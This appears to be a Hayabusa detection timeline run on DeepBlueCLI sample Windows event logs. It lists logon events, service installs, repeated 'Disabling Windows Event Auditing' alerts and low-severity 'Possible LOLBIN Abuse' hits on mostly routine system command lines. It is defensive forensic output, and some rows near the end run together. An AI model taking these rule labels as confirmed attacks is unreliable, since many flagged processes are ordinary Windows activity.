2014-11-27 08:25:04.605 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x17125,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:25:05.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:25:51.420 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:25:53.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:25:54.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 08:25:55.414 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1ac86,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1ac86 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1b245 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:25:55.414 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:26:40.560 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1b245,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:26:42.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-29 00:46:09.645 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-29 00:46:10.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-29 00:46:10.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-29 00:46:12.437 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1a23a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1a23a | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1a265 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-29 00:46:12.437 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-29 00:48:19.456 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1a265,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-29 00:48:20.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-18 23:46:21.750 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1e056,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1e056 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1e3c9 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:46:21.750 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:46:33.911 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1e3c9,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,info,,Logoff,User: IEUser | LID: 0x1e3c9,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,info,,Logoff,User: IEUser | LID: 0x1e056,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:04.676 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x6831f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x6831f | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x6832b | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:04.676 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:20.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-18 23:47:20.053 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x6832b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:36.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-18 23:47:36.671 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:37.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-18 23:47:38.430 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1dc1e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:38.430 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1dc1e | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:38.430 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1ee41 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:38.430 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:48:31.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-18 23:48:31.289 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1ee41,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:49:38.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-18 23:49:38.281 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:49:39.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-18 23:49:40.000 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1b293,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1b293 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1b2fd | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:49:40.000 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:49:42.406 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Intel(R) PRO/1000 NDIS 6 Adapter Driver | Path: system32\DRIVERS\E1G60I32.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 00:28:28.043 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1b2fd,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:28:38.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 00:29:27.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 00:29:27.609 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:29:28.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 00:29:29.859 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1aae1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1aae1 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1af2f | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:29:29.859 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:32:23.580 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: Google Update Service (gupdate) | Path: ""C:\Program Files\Google\Update\GoogleUpdate.exe"" /svc | Account: LocalSystem | Start Type: auto start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 00:32:23.595 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: Google Update Service (gupdatem) | Path: ""C:\Program Files\Google\Update\GoogleUpdate.exe"" /medsvc | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 01:52:36.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 01:52:58.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 01:52:58.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 01:58:34.966 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x190 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 01:58:34.997 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x72c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 02:06:20.341 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd 
Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0xb44 | User: IEUser | LID: 0x970d9",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 02:34:07.763 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\winsat.exe formal -log -cancelevent 850b2fce-84b7-4abd-a41f-f04c912c6e37 | Path: C:\Windows\System32\WinSAT.exe | PID: 0xfe4 | User: IEUser | LID: 0x970a9,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 02:35:08.751 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" -IdleTask -TaskName MpIdleTask | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x600 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 02:37:08.229 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xb70 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 02:44:08.468 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xd68 | User: IE10WIN7$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 02:44:08.499 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\itulqket.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x34c | User: IEUser | LID: 0x970a9",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 02:44:08.609 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\ssh63wbw.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xa50 | User: IEUser | LID: 0x970a9",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 02:44:08.765 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\pcbguge2.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xee8 | User: IEUser | LID: 0x970a9",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 02:44:08.859 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\uacrfkow.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 
0x7d8 | User: IEUser | LID: 0x970a9",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 02:44:09.484 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" ""Local CMOS Clock"" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x944 | User: IEUser | LID: 0x970a9",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 02:44:09.499 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xe70 | User: IEUser | LID: 0x970a9",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 03:07:37.968 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Path: C:\Windows\System32\rundll32.exe | PID: 0x7d8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 03:46:19.937 